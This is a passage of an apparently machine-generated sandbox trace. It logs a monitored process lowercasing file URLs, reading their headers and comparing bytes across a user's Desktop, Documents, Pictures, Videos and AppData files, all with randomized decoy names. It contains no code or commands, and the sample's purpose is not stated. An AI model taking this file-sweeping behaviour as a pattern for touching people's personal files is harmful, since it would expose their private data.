_Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/w5qVDpAe9jrZ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf" [0085.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 77 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.776] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.776] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/gXV2c5bZMUaI647PCLru.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx" [0085.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 90 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.776] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.776] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/xCj9P.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg" [0085.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 63 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.776] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.776] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.776] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/28lAXbsQ3m50.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg" [0085.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 125 [0085.777] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.777] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.777] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.777] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/uHTKQ-Tczvm9TDvXVw.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv" [0085.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 83 [0085.777] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.777] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.777] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.777] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/HbY7GwiJ.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc" [0085.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 77 [0085.778] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.778] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/6FsHFfojtWSpRY33.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt" [0085.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 66 [0085.778] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.778] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/a3nE_YxUm0cLd.csv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv" [0085.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 82 [0085.778] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.778] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/v0uFl0Ag.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv" [0085.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 73 [0085.778] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.778] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/ZWfvn9IebK6WZpaG.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv" [0085.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 72 [0085.778] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.778] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/0ivkoykEH0-Af8.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png" [0085.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 144 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/SHCJ2UKHhA9e2.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 95 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/xQiySgiqzH.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 75 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/P0mmc6MKtCPT8JZ.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 84 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/JbJbAyjAlmaQe.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 121 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/pjm8g%20hD0vDM.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 65 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/saeiBJK2.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 96 [0085.779] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.779] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/UwEfM1NA-DSDIRW%20V7.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp" [0085.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 133 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/cVM_.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 79 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/NNKxQYu2C.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 74 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/yZVSRi7WB0.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 98 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/NCgtsU2wGQ6.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 67 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/Ym9TcVsa3hY3_SCH.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 71 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.780] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/IVPBf2a6ZWG8Th8g0v.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf" [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 73 [0085.780] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/Hsii3%20s6Wx.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 68 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/pVp12cuh1.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 65 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/GGxj998_.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 55 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/CRxV%20J7WKoOCqRc.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 64 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/gM13IfQVW%20O2Ca5SQCfU.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 78 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/X-baj.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv" [0085.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 61 [0085.781] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.781] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/Y0vXIkBYowmim.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 61 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/lxcFr82x4aQ4USWN.mkv" | out: 